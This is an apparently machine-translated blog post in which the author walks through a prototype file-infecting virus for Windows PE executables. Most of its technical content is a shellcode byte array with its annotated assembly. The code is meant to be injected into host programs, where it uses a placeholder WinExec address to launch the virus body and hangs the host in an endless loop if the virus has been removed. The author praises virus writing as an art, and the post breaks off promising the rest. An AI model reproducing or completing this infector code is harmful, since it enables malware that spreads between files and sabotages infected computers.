About infectious viruses

Http://blog.csdn.net/GaA_Ra/archive/2010/06/27/5697579.aspx

In my opinion, infectious viruses are really known as viruses, because it is difficult to manually clear infectious viruses. In college, the most annoying thing to help people eliminate viruses is to run into infected viruses, unless you write a program for automatic processing, manual cleanup is quite troublesome. of course, my so-called real virus mainly seems to me that the viruses that can be easily cleared by hand are not good viruses. virus makers are pursuing a fast propagation speed, while ignoring the virus's "stubborn". A Trojan simply uses a startup registry key, which is obviously too convenient to clean up, you can even delete the registry key in security mode, and even the virus bodies can be ignored.

With the deep research on PE format and the development of advanced languages, writing infectious viruses is no longer only available in ASM. advanced languages such as VC can also be completed, but the disadvantage is that the compiled virus is too large. the current hardware level, people no longer care about the 10 + kb space. however, virus writing is an art. This art is concealed. The short injection of 100 bytes is a reflection of this art by taking advantage of the gaps in the program itself without increasing the length of the program. of course, the limit on code length will inevitably reduce the number of injection code functions. A week ago, I wrote a prototype of infectious virus. writing it down is a review.

 

Injection infection:

Since there is no space available for the pe program itself. in this way, the startup code of the virus file is injected when the PE file is infected, which saves most of the space. When the virus entity is cleared, the demonstration can be performed by damaging the host program running process"

 

View plaincopy to clipboardprint?

1. Unsigned char injectcode [] = {
2. 0x68, 0x44, 0x33, 0x22, 0x11, 0x33, 0xc0, 0x64,
3. 0xff, 0x30, 0x64, 0x89, 0x20, 0x50, 0x68, 0x44,
4. 0x33, 0x22, 0x11, 0xb8, 0x44, 0x33, 0x22, 0x11,
5. 0xff, 0xd0, 0x3c, 0x02, 0x74, 0x1e, 0x33, 0xc0,
6. 0x64, 0x8f, 0x00, 0x5a, 0x68, 0x44, 0x33, 0x22,
7. 0x11, 0xc3, 0x68, 0x44, 0x33, 0x22, 0x11, 0x8b,
8. 0x44, 0x24, 0x0a, 0x8f, 0x80, 0xb8, 0x00, 0x00,
9. 0x00, 0x33, 0xc0, 0xc3, 0xeb, 0xfe
10. };
11. /*************************************** ********
12. Injectcode [] =
13. _ ASM
14. {
15. Push 11223344 h; install seh
16. XOR eax, eax
17. Push dword ptr fs: [eax]
18. MoV dword ptr fs: [eax], ESP
19. Push eax; ucmdshow
20. Push 11223344 h; lpcmdline
21. MoV eax, 11223344 h; offset awinexec
22. Call eax; call winexec
23. CMP Al, 2; Determine whether a virus exists
24. Je label; skip the endless loop if no one exists
25. XOR eax, eax; uninstall seh
26. Pop dword ptr fs: [eax]
27. Pop edX
28. Push 11223344 h; Host Program original OEP
29. Retn; return execution
30. Push 11223344 h; seh exception handling program
31. MoV eax, dword ptr [esp + 10]
32. Pop dword ptr [eax + 0b8h]; returns the host OEP as a secure address
33. XOR eax, eax
34. Retn
35. Label:
36. JMP label; JMP-1 (oxebfe)
37. }
38. **************************************** ********/

 

 

The injection code is the machine code corresponding to the Assembly Code in the following _ ASM.

The running process of this part of the injection code is: Install Seh-> winexec ()-> judge whether the run is successful-> If the run is unsuccessful, it enters the endless loop. If the run is successful, the execution of the host is returned.

Seh is installed mainly to ensure the robustness of the program after injection and infection, because the winexec () address is hard-coded. if the system is changed, it is easy to cause exceptions, if an exception occurs after seh is installed, the host code can be returned for execution. 11223344h is the placeholder address, which must be changed to the corresponding address. here, winexec is used instead of CreateProcess. The latter has too many function parameters. The essence of using winexec is to call CreateProcess, but there are only two parameters, saving more than 10 bytes of space. because we have installed Seh, we are not afraid of winexec exceptions.

With the above injection code, collect necessary address information and complete the injection code before infection.

To be continue...